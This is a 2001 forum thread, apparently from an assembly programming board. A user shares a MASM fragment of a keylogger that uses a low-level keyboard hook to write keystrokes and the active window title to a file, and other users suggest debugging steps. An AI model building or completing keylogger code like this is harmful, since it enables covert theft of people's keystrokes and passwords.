invoke GetForegroundWindow
.IF eax == hWndFG
invoke WriteFile, fWnd, addr lParam, 1, addr bytesWritten, NULL
mov hWndFG, eax
invoke GetWindowText, hWndFG, addr AppName, 1024
invoke WriteFile, fWnd, addr AppName, eax, addr bytesWritten, NULL
invoke WriteFile, fWnd, addr CRLF, 2, addr bytesWritten, NULL
; invoke PostMessage, hWnd, WM_KEYHOOK, wParam, lParam

Here is a snippet of my code. If the hWnd changes from keystroke to keystroke, the Application name will be in the file, otherwise a keystroke will be logged. I think the code speaks for itself.

This P.O.S code compiles fine, but when I go to run it, it doesn't work correctly. ONLY the appname is logged, in place of keystrokes. I had to comment out the postmessage line to stop the prog from writing the appname over and over! I'm not changing the active window when I run the program. Is my logic wrong? Is the window handle constantly changing?

Please help..... in desperate need.....

thanks in advance........
Posted on 2001-10-16 22:27:19 by lackluster
Afternoon, Lackluster.

I dunno if this'll help, however it's worth a try.

It could be that the *.if....else* macro is mucking around with eax (This is a total guess - I really wouldn't have a clue ;) ).
Try adding another *invoke GetForegroundWindow* straight after the *.ELSE* and see if it works.

Posted on 2001-10-17 02:30:31 by Scronty
lackluster, forgive me if my question is stupid but is your hWndFG a "global" variable?
Posted on 2001-10-17 02:48:18 by japheth
And why do you think that lParam should have the address of the byte made by the keystroke?
Posted on 2001-10-17 04:19:07 by The Svin
My best guess would be how you have declared 'hWndFG'.

Same as what japheth was saying, if you have made hWndFG a LOCAL variable on the stack, its value is highly likely to change each time the WM_KEYHOOK message is received.
Posted on 2001-10-17 05:18:15 by huh
The variable is global defined in the .data section as:
hWndFG dd 0

WM_KEYHOOK is defined under .const as:

It does return a keystroke. I'm using WH_KEYBOARD_LL hook type and passing the time stamp in wParam, and the char (after converting the VK) in lParam.

I haven't yet been home to check Scronty's (great sig by the way ;)) suggestion.
Posted on 2001-10-17 10:17:49 by lackluster
Nope, that didn't work either. I changed the .IF .ELSE to cmp jne. I think I've tried everything. I'm going to go cry like a schoolgirl now...
Posted on 2001-10-17 19:46:04 by lackluster

Use OutputDebugString to display the hWnd and other interesting stuff. Since the low level keyboard hook is a bit time critical, I suggest deactivating the writing to files in the first step.

To show the output of OutputDebugString in Windows NT/2000, there is freeware available.

Posted on 2001-10-18 03:38:17 by japheth
Actually that's the reason for my most recent post (Int-->String). I was going to display the hWnd in the messageboxes. Would there be an advantage to using the OutputDebugString instead?
Posted on 2001-10-18 08:30:10 by lackluster